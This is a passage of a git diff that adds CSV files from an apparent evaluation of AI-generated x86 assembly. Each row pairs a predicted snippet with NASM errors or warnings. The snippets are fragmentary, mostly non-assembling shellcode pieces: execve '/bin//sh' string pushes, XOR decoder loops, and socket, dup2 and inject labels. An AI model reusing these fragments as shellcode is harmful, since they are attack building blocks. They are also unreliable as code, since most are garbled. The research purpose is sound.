esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: error: invalid combination of opcode and operands +" +push setgid \\n pop = \\n pop 0x2e;"assembly_instruction.asm:2: error: expression syntax error +" +cmp loc_402b13, loc_402b13 \\n je loc_402b13;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push sys_connect \\n pop = \\n pop ebx;"assembly_instruction.asm:2: error: expression syntax error +" +mov zero_reg, [[];"assembly_instruction.asm:1: error: expression syntax error +" +mov esi, word [esi];"assembly_instruction.asm:1: error: mismatch in operand sizes +" +push byte 0x8 \\n pop 0x8;"assembly_instruction.asm:2: error: invalid combination of opcode and operands +" +xor eax, eax \\n mov numebr, esp;"assembly_instruction.asm:2: error: invalid combination of opcode and operands +" +mov mm3, \shellcode\;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" diff --git a/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/Filtered Snipptes/output_syntactic_analysis_symbolNotDefined_assembly_test_output.csv b/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/Filtered Snipptes/output_syntactic_analysis_symbolNotDefined_assembly_test_output.csv new file mode 100644 index 0000000000000000000000000000000000000000..179456f88577e09cd9b6f5750c5c26870a431f63 --- /dev/null +++ b/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/Filtered Snipptes/output_syntactic_analysis_symbolNotDefined_assembly_test_output.csv @@ -0,0 +1,185 @@ +Predicted Snippets;NASM Output Symbol Not Defined +mov eax, y;"assembly_instruction.asm:1: error: symbol `y' not defined +" +mov al, byte_tbl+2;"assembly_instruction.asm:1: error: symbol `byte_tbl' not defined +" +mov ebx, y;"assembly_instruction.asm:1: error: symbol `y' not defined +" +push af_inet6;"assembly_instruction.asm:1: error: symbol `af_inet6' not defined +" +cmp edx, 0x43 \\n jge loop \\n push edx;"assembly_instruction.asm:2: error: symbol `loop' not defined +" +mov bl, sys_socket;"assembly_instruction.asm:1: error: symbol `sys_socket' not defined +" +cmp cl, dl \\n je _encodedshellcode;"assembly_instruction.asm:2: error: symbol `_encodedshellcode' not defined +" +cmp cl, 0xff, \\n jne _dup2;"assembly_instruction.asm:2: error: symbol `_dup2' not defined +" +jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;"assembly_instruction.asm:1: error: symbol `zero68732f' not defined +assembly_instruction.asm:2: error: symbol `zero68732f' not defined +assembly_instruction.asm:3: error: symbol `zero68732f' not defined +assembly_instruction.asm:4: error: symbol `zero68732f' not defined +assembly_instruction.asm:5: error: symbol `zero6e69622f' not defined +assembly_instruction.asm:6: error: symbol `zero69622f' not defined +assembly_instruction.asm:7: error: symbol `zero69622f' not defined +assembly_instruction.asm:8: error: symbol `zero69622f' not defined +assembly_instruction.asm:9: error: symbol `zero69622f' not defined +assembly_instruction.asm:10: error: symbol `zero69622f' not defined +assembly_instruction.asm:11: error: symbol `zero69622f' not defined +assembly_instruction.asm:12: error: symbol `zero69622f' not defined +assembly_instruction.asm:13: error: symbol `zero69622f' not defined +assembly_instruction.asm:14: error: symbol `zero69622f' not defined +" +mov ecx, [args];"assembly_instruction.asm:1: error: symbol `args' not defined +" +jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;"assembly_instruction.asm:1: error: symbol `zero68732f' not defined +assembly_instruction.asm:2: error: symbol `zero68732f' not defined +assembly_instruction.asm:3: error: symbol `zero68732f' not defined +assembly_instruction.asm:4: error: symbol `zero68732f' not defined +assembly_instruction.asm:5: error: symbol `zero6e69622f' not defined +assembly_instruction.asm:6: error: symbol `zero69622f' not defined +assembly_instruction.asm:7: error: symbol `zero69622f' not defined +assembly_instruction.asm:8: error: symbol `zero69622f' not defined +assembly_instruction.asm:9: error: symbol `zero69622f' not defined +assembly_instruction.asm:10: error: symbol `zero69622f' not defined +assembly_instruction.asm:11: error: symbol `zero69622f' not defined +assembly_instruction.asm:12: error: symbol `zero69622f' not defined +assembly_instruction.asm:13: error: symbol `zero69622f' not defined +assembly_instruction.asm:14: error: symbol `zero69622f' not defined +" +jns _start-0x24;"assembly_instruction.asm:1: error: symbol `_start' not defined +" +mov ebx, var3;"assembly_instruction.asm:1: error: symbol `var3' not defined +" +cmp al, 2 \\n jne while \\n jmp do_inject;"assembly_instruction.asm:2: error: symbol `while' not defined +assembly_instruction.asm:3: error: symbol `do_inject' not defined +" +cmp eax, ebx \\n jne child;"assembly_instruction.asm:2: error: symbol `child' not defined +" +cmp BYTE [esi], 0x7 \\n jl lowbound;"assembly_instruction.asm:2: error: symbol `lowbound' not defined +" +push for \\n push af_inet;"assembly_instruction.asm:1: error: symbol `for' not defined +assembly_instruction.asm:2: error: symbol `af_inet' not defined +" +push sockfd;"assembly_instruction.asm:1: error: symbol `sockfd' not defined +" +pop ecx \\n dec ecx \\n jmp l1;"assembly_instruction.asm:3: error: symbol `l1' not defined +" +dec ecx \\n jns bucle;"assembly_instruction.asm:2: error: symbol `bucle' not defined +" +jns _loop2;"assembly_instruction.asm:1: error: symbol `_loop2' not defined +" +mov byte [var1], 0x2f;"assembly_instruction.asm:1: error: symbol `var1' not defined +" +mov ecx, args;"assembly_instruction.asm:1: error: symbol `args' not defined +" +jz _decode;"assembly_instruction.asm:1: error: symbol `_decode' not defined +" +push host_sockfd;"assembly_instruction.asm:1: error: symbol `host_sockfd' not defined +" +cmp bl, 78h \\n jge loc_402B1D;"assembly_instruction.asm:2: error: symbol `loc_402B1D' not defined +" +xor bl, 0xaa \\n jnz encodedshellcode;"assembly_instruction.asm:2: error: symbol `encodedshellcode' not defined +" +jmp short _stage;"assembly_instruction.asm:1: error: symbol `_stage' not defined +" +cmp bl, 0xbb \\n jge xordecode \\n jmp notdecode;"assembly_instruction.asm:2: error: symbol `xordecode' not defined +assembly_instruction.asm:3: error: symbol `notdecode' not defined +" +cmp bl, 0xaa \\n jz shellcode;"assembly_instruction.asm:2: error: symbol `shellcode' not defined +" +mov al, __nr_fork;"assembly_instruction.asm:1: error: symbol `__nr_fork' not defined +" +jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;"assembly_instruction.asm:1: error: symbol `zero68732f' not defined +assembly_instruction.asm:2: error: symbol `zero68732f' not defined +assembly_instruction.asm:3: error: symbol `zero68732f' not defined +assembly_instruction.asm:4: error: symbol `zero68732f' not defined +assembly_instruction.asm:5: error: symbol `zero6e69622f' not defined +assembly_instruction.asm:6: error: symbol `zero69622f' not defined +assembly_instruction.asm:7: error: symbol `zero69622f' not defined +assembly_instruction.asm:8: error: symbol `zero69622f' not defined +assembly_instruction.asm:9: error: symbol `zero69622f' not defined +assembly_instruction.asm:10: error: symbol `zero69622f' not defined +assembly_instruction.asm:11: error: symbol `zero69622f' not defined +assembly_instruction.asm:12: error: symbol `zero69622f' not defined +assembly_instruction.asm:13: error: symbol `zero69622f' not defined +assembly_instruction.asm:14: error: symbol `zero69622f' not defined +" +xor cl, 0xAA \\n jz shift_decode;"assembly_instruction.asm:2: error: symbol `shift_decode' not defined +" +decoded_shellcode: \\n call stack;"assembly_instruction.asm:2: error: symbol `stack' not defined +" +cmp ax, bx \\n jne while;"assembly_instruction.asm:2: error: symbol `while' not defined +" +L4: \\n jmp short stack;"assembly_instruction.asm:2: error: symbol `stack' not defined +" +jmp short _setup;"assembly_instruction.asm:1: error: symbol `_setup' not defined +" +call sys_read;"assembly_instruction.asm:1: error: symbol `sys_read' not defined +" +test eax, eax \\n jz checkforfile;"assembly_instruction.asm:2: error: symbol `checkforfile' not defined +" +F2: \\n call function1;"assembly_instruction.asm:2: error: symbol `function1' not defined +" +cmp eax, ebx \\n jne all;"assembly_instruction.asm:2: error: symbol `all' not defined +" +test eax, eax \\n jz write;"assembly_instruction.asm:2: error: symbol `write' not defined +" +test eax, eax \\n jns _while_loop;"assembly_instruction.asm:2: error: symbol `_while_loop' not defined +" +jz _encodedshellcode;"assembly_instruction.asm:1: error: symbol `_encodedshellcode' not defined +" +cmp al, 0xf2 \\n jge _start;"assembly_instruction.asm:2: error: symbol `_start' not defined +" +jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;"assembly_instruction.asm:1: error: symbol `zero68732f' not defined +assembly_instruction.asm:2: error: symbol `zero68732f' not defined +assembly_instruction.asm:3: error: symbol `zero68732f' not defined +assembly_instruction.asm:4: error: symbol `zero68732f' not defined +assembly_instruction.asm:5: error: symbol `zero6e69622f' not defined +assembly_instruction.asm:6: error: symbol `zero69622f' not defined +assembly_instruction.asm:7: error: symbol `zero69622f' not defined +assembly_instruction.asm:8: error: symbol `zero69622f' not defined +assembly_instruction.asm:9: error: symbol `zero69622f' not defined +assembly_instruction.asm:10: error: symbol `zero69622f' not defined +assembly_instruction.asm:11: error: symbol `zero69622f' not defined +assembly_instruction.asm:12: error: symbol `zero69622f' not defined +assembly_instruction.asm:13: error: symbol `zero69622f' not defined +assembly_instruction.asm:14: error: symbol `zero69622f' not defined +" +jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;"assembly_instruction.asm:1: error: symbol `zero68732f' not defined +assembly_instruction.asm:2: error: symbol `zero68732f' not defined +assembly_instruction.asm:3: error: symbol `zero68732f' not defined +assembly_instruction.asm:4: error: symbol `zero68732f' not defined +assembly_instruction.asm:5: error: symbol `zero6e69622f' not defined +assembly_instruction.asm:6: error: symbol `zero69622f' not defined +assembly_instruction.asm:7: error: symbol `zero69622f' not defined +assembly_instruction.asm:8: error: symbol `zero69622f' not defined +assembly_instruction.asm:9: error: symbol `zero69622f' not defined +assembly_instruction.asm:10: error: symbol `zero69622f' not defined +assembly_instruction.asm:11: error: symbol `zero69622f' not defined +assembly_instruction.asm:12: error: symbol `zero69622f' not defined +assembly_instruction.asm:13: error: symbol `zero69622f' not defined +assembly_instruction.asm:14: error: symbol `zero69622f' not defined +" +jge write;"assembly_instruction.asm:1: error: symbol `write' not defined +" +push trasnfer \\n pop ecx;"assembly_instruction.asm:1: error: symbol `trasnfer' not defined +" +jmp code;"assembly_instruction.asm:1: error: symbol `code' not defined +" +cmp eax, ebx \\n je _exit;"assembly_instruction.asm:2: error: symbol `_exit' not defined +" +cmp DWORD [eax], edi \\n jne l1;"assembly_instruction.asm:2: error: symbol `l1' not defined +" +push __nr_execve \\n pop eax;"assembly_instruction.asm:1: error: symbol `__nr_execve' not defined +" +mov eax, value -1 \\n not eax;"assembly_instruction.asm:1: error: symbol `value' not defined +" +jmp shellcode;"assembly_instruction.asm:1: error: symbol `shellcode' not defined +" +jge exi;"assembly_instruction.asm:1: error: symbol `exi' not defined +" +cmp al, 2 \\n jne do_inject;"assembly_instruction.asm:2: error: symbol `do_inject' not defined +" +jne exit;"assembly_instruction.asm:1: error: symbol `exit' not defined +" diff --git a/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/Filtered Snipptes/output_syntactic_analysis_warning_assembly_test_output.csv b/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/Filtered Snipptes/output_syntactic_analysis_warning_assembly_test_output.csv new file mode 100644 index 0000000000000000000000000000000000000000..cc966636ec750bffe0b668491fef21c0db8883c4 --- /dev/null +++ b/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/Filtered Snipptes/output_syntactic_analysis_warning_assembly_test_output.csv @@ -0,0 +1,426 @@ +Predicted Snippets;NASM Output Warning +push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +" +mov al, 0x68732f2f \\n int 0x6e69622f;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +" +push edx \\n push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x;"assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +" +push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +" +section;"assembly_instruction.asm:1: warning: multi-line macro `section' exists, but not taking 0 parameters [-w+macro-params-multi] +assembly_instruction.asm:1: warning: label alone on a line without a colon might be in error [-w+label-orphan] +" +push word 0x68732f2f \\n push word 0x6e69622f \\n push word 0x69622f \\n push word 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +" +push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov linefeed, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: error: invalid combination of opcode and operands +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov filecontents, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: error: invalid combination of opcode and operands +" +push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov bl, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: error: invalid combination of opcode and operands +" +mov cl, 0x68732f2f \\n add cl, 0x68732f \\n add cl, 0x6e69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x69622f \\n add cl, 0x6e69622f \\n add cl, 0x6e69622f \\n add cl, 0x69622f2f \\n add cl, 0x6;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: byte data exceeds bounds [-w+number-overflow] +" +push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +" +push temrinated \\n push '/bin//sh' \\n push ebx \\n push edx \\n push temrinated \\n push '/bin//sh' \\n push ebx \\n mov edx, esp;"assembly_instruction.asm:2: warning: character constant too long [-w+other] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: character constant too long [-w+other] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n mov eax, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +" +mov al, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +" +push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +" +mov eax, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f;"assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +" +push 0x1ff9090 \\n push ecx \\n push 0x10 \\n push 0x1ff9090 \\n push ecx \\n push 0x10 \\n mov 0x10, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: error: invalid combination of opcode and operands +" +push 0x978cd092 \\n pop edi \\n pop ebx;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +" +mov ebx, ptr;"assembly_instruction.asm:1: warning: `ptr' is not a NASM keyword [-w+ptr] +assembly_instruction.asm:3: warning: `ptr' is not a NASM keyword [-w+ptr] +" +mov al, 0x68732f2f \\n mov al, 0x68732f \\n mov al, 0x6e69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x6e69622f \\n mov al, 0x69622f \\n mov al, 0x6e69622f \\n mov al, 0x69622;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: byte data exceeds bounds [-w+number-overflow] +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +" +section \\n uninitialized: db 0x68732f2f \\n db 0x6e69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f2f \\n db 0x69622;"assembly_instruction.asm:1: warning: multi-line macro `section' exists, but not taking 0 parameters [-w+macro-params-multi] +assembly_instruction.asm:1: warning: label alone on a line without a colon might be in error [-w+label-orphan] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: byte data exceeds bounds [-w+number-overflow] +" +jmp short esp;"assembly_instruction.asm:1: warning: invalid register size specification ignored [-w+regsize] +" +push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: 